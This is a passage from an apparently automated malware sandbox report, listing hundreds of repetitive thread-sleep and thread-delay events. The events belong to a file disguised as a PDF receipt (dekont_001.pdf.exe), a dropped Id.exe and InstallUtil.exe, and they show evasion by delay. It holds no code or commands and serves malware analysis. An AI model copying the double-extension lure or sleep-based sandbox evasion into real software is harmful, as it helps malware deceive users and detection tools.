Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598576s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598354s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598247s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597905s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596982s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596654s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596323s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -595007s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 7124	Thread sleep count: 2159 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 7124	Thread sleep count: 4329 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99653s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99305s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98904s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97495s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -97032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -96907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -96766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -96616s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -96497s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -96375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -96266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe TID: 6300	Thread sleep time: -96157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599893s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3636	Thread sleep count: 7526 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3636	Thread sleep count: 2286 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599768s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599518s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599393s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599268s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599143s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -599018s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598893s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598768s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598518s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598393s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598268s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598143s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -598018s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597893s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597768s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597518s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597393s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597268s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597143s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -597018s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596893s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596768s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596518s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596393s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596268s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596143s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -596018s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595893s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595768s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595518s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595393s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595268s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595143s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -595018s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594893s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594768s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594503s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594356s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594249s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -594034s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208	Thread sleep time: -593909s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99016	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98333	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98218	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97967	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97858	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97750	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97640	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97531	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97422	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97309	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97203	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97094	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96969	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96640	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96422	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96313	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96188	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96078	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95969	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95844	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95734	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95566	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95438	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95313	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95188	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95078	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94969	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94844	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94734	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598354	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598247	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596323	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595343	Jump to behavior
